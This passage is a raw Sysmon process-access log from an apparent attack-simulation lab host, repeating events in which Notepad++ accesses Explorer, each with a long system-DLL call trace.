Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047043Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000001047042Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+81da7|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF802784DF8C8)|UNKNOWN(FFFFCC0D472B4A68)|UNKNOWN(FFFFCC0D472AF715)|UNKNOWN(FFFFCC0D472B0C3A)|UNKNOWN(FFFFCC0D472FF1B5)|UNKNOWN(FFFFF802781F6E03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9814|C:\Windows\System32\win32u.dll+10c4 
10341000x80000000000000001047041Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047040Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047039Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047038Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047037Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047036Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047035Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047034Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047033Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047032Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047031Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047030Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.885{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+81b8d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 10341000x80000000000000001047029Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.870{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81c2d|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001047028Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:30.870{466BC892-35E4-60E8-4B0C-00000000CF01}73364916C:\Program 
Files\Notepad++\notepad++.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+81ba9|C:\Windows\System32\SHELL32.dll+822d3|C:\Windows\System32\SHELL32.dll+82204|C:\Windows\System32\SHELL32.dll+81ab2|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+